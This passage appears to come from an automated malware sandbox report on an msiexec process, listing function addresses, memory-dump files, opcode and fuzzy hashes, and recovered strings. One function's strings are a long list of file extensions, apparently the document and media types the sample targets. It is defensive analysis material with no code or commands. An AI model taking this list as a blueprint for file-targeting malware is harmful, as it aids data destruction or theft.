                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8853d9111e3d09989aab29ee1709b41d1c76f645e6f82c6a82930d6ac78c531c
                                                                                                                                                                                                                                • Instruction ID: 5f206a658f5a86ae0af5e494746274b27728617ef2cd4bc1a89fb173ebaf3452
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8853d9111e3d09989aab29ee1709b41d1c76f645e6f82c6a82930d6ac78c531c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7411E3315093958ECB39CF2880207FAFBE1ABD6314F1889ADD4C597192DB349416CB86
                                                                                                                                                                                                                                Function 00305DD0 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 42b3995fb05ba2d6ab916736a865c7a487c1d8658494739d7c0b4ed64cb6f6be
                                                                                                                                                                                                                                • Instruction ID: 6796562734e478e3f1988c06d31a8ef0371ad69473aead237d49cd2f4d5296c6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42b3995fb05ba2d6ab916736a865c7a487c1d8658494739d7c0b4ed64cb6f6be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D601FCF1702B0147EB229E15D4E873BB2A89F91714F59043CD4884B3C2EB71ED15CEA5
                                                                                                                                                                                                                                Function 00307CA3 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8f1fb870e534d30f14ba38abfb16f27e1e932e2f23a2b7dd770fc73d4444481d
                                                                                                                                                                                                                                • Instruction ID: 31547161238405d58cfea4b2a0f49f93d4ec3eb56748e7b5b53b2e318f13169a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f1fb870e534d30f14ba38abfb16f27e1e932e2f23a2b7dd770fc73d4444481d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D901F1326207408FD729CF39C8A5FA7B7EAEB86310F18892CD096C7256CB38B401CB11
                                                                                                                                                                                                                                Function 00319883 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: de8fe2b55ef9b5db72a078622e5c7edbe66cc86be4e000839977194775acc9d1
                                                                                                                                                                                                                                • Instruction ID: 02263810d66b77d68ad9ce1fb7863c3fe45a9fc03106bb57e500cc5bcb19ae89
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de8fe2b55ef9b5db72a078622e5c7edbe66cc86be4e000839977194775acc9d1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE04F75A192808FEB1E9F2CE8A15A6B7F9EB9B704F24582DC083D3721C135D413CA0A
                                                                                                                                                                                                                                Function 00316390 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3c0b97da7f5b7163e2f1f0a3116f3f0bd4672ad5c78592706b0b02764a7c6e13
                                                                                                                                                                                                                                • Instruction ID: c4e87e36993eb10efb0cb096fc14c2bcae769aca1e46009e67bfc8e73b4242c9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c0b97da7f5b7163e2f1f0a3116f3f0bd4672ad5c78592706b0b02764a7c6e13
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE0123454C6808ED34A9B24D19266FFBA1DBD7710F109C1CC5C517761CA39981ACB46
                                                                                                                                                                                                                                Function 00305A63 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1dad9c36f4548be12f11b2ded66d1107bba49bc57a3d51690593ddec657595d9
                                                                                                                                                                                                                                • Instruction ID: 1bb5534fe050707993d75552d615835b91082125c9dfd1676a16b04854b1cf59
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dad9c36f4548be12f11b2ded66d1107bba49bc57a3d51690593ddec657595d9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14B092A5C924618AA0232A123C124BBB0288913218F443830E84A23282BA16D22A499F
                                                                                                                                                                                                                                Function 06181080 Relevance: 175.5, APIs: 1, Strings: 99, Instructions: 490COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06182D20: Concurrency::cancel_current_task.LIBCPMT ref: 06182E2E
                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 06181960
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                • String ID: .aac$.accdb$.accde$.accdr$.accdt$.adt$.adts$.aif$.aifc$.aiff$.aspx$.avi$.bin$.bmp$.cab$.cda$.csv$.dif$.doc$.docm$.docx$.dot$.dotx$.eml$.eps$.flv$.gif$.htm$.html$.ini$.iso$.jar$.jpeg$.jpg$.m4a$.mdb$.mid$.midi$.mov$.mp3$.mp4$.mpeg$.mpg$.mui$.pdf$.png$.pot$.potm$.potx$.ppam$.pps$.ppsm$.ppsx$.ppt$.pptm$.pptx$.psd$.pst$.pub$.rar$.rtf$.sldm$.sldx$.swf$.tif$.tiff$.tmp$.vob$.vsd$.vsdm$.vsdx$.vss$.vssm$.vst$.vstm$.vstx$.wav$.wbk$.wks$.wma$.wmd$.wms$.wmv$.wmz$.wp5$.wpd$.xla$.xlam$.xll$.xlm$.xls$.xlsm$.xlsx$.xlt$.xltm$.xltx$.xps$.zip$b
                                                                                                                                                                                                                                • API String ID: 118556049-612049309
                                                                                                                                                                                                                                • Opcode ID: 33dabd4dc443a6fb80796d99adcad3f50aaed8fba6b927043dd0f2687f55e3fd
                                                                                                                                                                                                                                • Instruction ID: fd7ba856be589bda026d95bc085bedda0769385ab6403783a689de28681a0505
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33dabd4dc443a6fb80796d99adcad3f50aaed8fba6b927043dd0f2687f55e3fd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E327A3890538CEDDBC6F7A4CD05BECBBB0DF6A215F5481C89454332819BB46B48DEA6
                                                                                                                                                                                                                                Function 0030CB0A Relevance: 59.7, APIs: 1, Strings: 33, Instructions: 158memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                • String ID: 0$A$C$E$G$H$I$K$L$M$O$O$P$Q$S$T$U$W$W$[$a$d$f$g$g$q$r$s$u$z$}$}$~
                                                                                                                                                                                                                                • API String ID: 2525500382-2768426949
                                                                                                                                                                                                                                • Opcode ID: ec8247299c4f856de9c4b38f65555b969123fc019ecbf7a009daf4a31c6c5a8c
                                                                                                                                                                                                                                • Instruction ID: 3b4575cedc2db78fd26c567a777b40ee06e545d3b15d8c5381fe44658dd4fc91
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec8247299c4f856de9c4b38f65555b969123fc019ecbf7a009daf4a31c6c5a8c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1291F56150DBC28AE332C73C881879FBED15BA6224F088B9DD5E95B3E2C3B94405C763
                                                                                                                                                                                                                                Function 00309B6D Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 99COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: )$+$-$/$1$3$5$7$9$;$=$>$?
                                                                                                                                                                                                                                • API String ID: 2610073882-1533546387
                                                                                                                                                                                                                                • Opcode ID: b1032ddcb45f131c705afd6b871bfe77584d9b13ec4ca195305fd2456dd28a15
                                                                                                                                                                                                                                • Instruction ID: 97a9f372832291b077af38dff8557f04f46196fc8aaddbfabf3f4cec7be32271
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1032ddcb45f131c705afd6b871bfe77584d9b13ec4ca195305fd2456dd28a15
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD415E30508B818EE726CF3CC898716BFD16B56314F08C6ADC4A64F3DBC6B59506C762
                                                                                                                                                                                                                                Function 00309F54 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 97COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: )$+$-$/$1$3$5$7$9$;$=$>$?
                                                                                                                                                                                                                                • API String ID: 2610073882-1533546387
                                                                                                                                                                                                                                • Opcode ID: e182231ae3f7a8b71239c66e24d8771e4aec9ca6e2eb4eb59d6e98b195fc4bf5
                                                                                                                                                                                                                                • Instruction ID: e74edfc1fa18f50f51ed703161e9488963bc2a110ba42e0cee399861a1f53488
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e182231ae3f7a8b71239c66e24d8771e4aec9ca6e2eb4eb59d6e98b195fc4bf5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1417D30508BC18ED7268F3CC898756BFD16B66314F08C6ADD49A4F3DBC6B98506C762
                                                                                                                                                                                                                                Function 0030D243 Relevance: 24.5, APIs: 2, Strings: 12, Instructions: 48COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: i$k$m$n$o$q$s$u$w$y${$}
                                                                                                                                                                                                                                • API String ID: 2610073882-434376181
                                                                                                                                                                                                                                • Opcode ID: e1af7b5205c9c346803fcf53fd5e495b806f59d75e5b9e8b11e070e57e614740
                                                                                                                                                                                                                                • Instruction ID: 755d46f86f48d0290d8ad967b7528ab669bc66dac44677a93aade8ad3208dccc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1af7b5205c9c346803fcf53fd5e495b806f59d75e5b9e8b11e070e57e614740
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA21A82440C7C1CDD32297BC944875EFFD15BA6364F084A9CE0E54A3E6D6AA9049C723
                                                                                                                                                                                                                                Function 0030CE7D Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 53COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                • String ID: i$k$m$n$o$q$s$u$w$y${$}
                                                                                                                                                                                                                                • API String ID: 1927566239-434376181
                                                                                                                                                                                                                                • Opcode ID: 440f305416e5be656b278947d4ad11911db8da8ae28adaa5eeccfda1296f9473
                                                                                                                                                                                                                                • Instruction ID: 946926bd6ed6a89f5553a4dd7654d5be90878fef8c21f538ade4ffcb0c28abea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 440f305416e5be656b278947d4ad11911db8da8ae28adaa5eeccfda1296f9473
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F521096040C7C1CED322967C840875EFFE15BA3328F084A9DE0E48A3E6D6AA9449C763
                                                                                                                                                                                                                                Function 0030CF92 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 93COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                • String ID: E$G$O$Q$^$`$d$g$h$m$x
                                                                                                                                                                                                                                • API String ID: 1927566239-3219273279
                                                                                                                                                                                                                                • Opcode ID: 15c7a9d908a2bac8efa8f4be7da28b0b825cff8a4979cf83b4f8d3cea1abf2a8
                                                                                                                                                                                                                                • Instruction ID: fdde5f090036fb990196b0e8790b97b745b18ba3aac3ad6da010cb24b4c94486
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15c7a9d908a2bac8efa8f4be7da28b0b825cff8a4979cf83b4f8d3cea1abf2a8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D41067010C3C18AD3619B38849875FBFD1AB96328F584A5CF0E95B3E2C6798545C763
                                                                                                                                                                                                                                Function 0030C422 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 92COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                • String ID: E$G$O$Q$^$`$d$g$h$m$x
                                                                                                                                                                                                                                • API String ID: 1927566239-3219273279
                                                                                                                                                                                                                                • Opcode ID: 32d6bd24a4b2fcf0e3dc66f226139f3033af6210c809eef5104f674486a8f680
                                                                                                                                                                                                                                • Instruction ID: 455cacee50b3d28202f8c33d394cb894d747cf9dabeda7735581c99bd4e081fd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32d6bd24a4b2fcf0e3dc66f226139f3033af6210c809eef5104f674486a8f680
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0641266000C7C19ED3628B3C849875EBFD09B96228F584B9CF0E99B2E2C6658549C767
                                                                                                                                                                                                                                Function 06187D34 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
